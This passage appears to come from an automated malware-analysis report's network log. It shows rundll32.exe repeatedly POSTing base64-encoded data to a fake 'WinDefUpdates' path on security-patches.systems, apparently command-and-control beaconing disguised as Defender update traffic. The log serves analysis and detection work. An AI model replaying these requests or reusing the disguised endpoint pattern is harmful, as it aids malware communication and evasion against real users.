4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:50.249119043 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:49 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49895	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:50.509150028 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:51.964090109 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:51 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49901	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:52.240524054 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:53.688677073 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:53 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49907	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:53.960017920 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:55.421680927 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:55 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49910	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:55.675766945 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:57.203618050 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:56 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49915	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:57.475862026 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:58.935419083 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49920	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:59.191375971 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:00.640741110 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:00 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49926	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:00.896578074 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:02.427086115 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49931	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:02.691401005 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:04.209209919 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:03 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49935	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:04.472807884 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:05.941159964 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49940	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:06.215673923 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:07.661025047 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:07 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49946	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:07.927522898 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:09.385750055 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:09 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49952	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
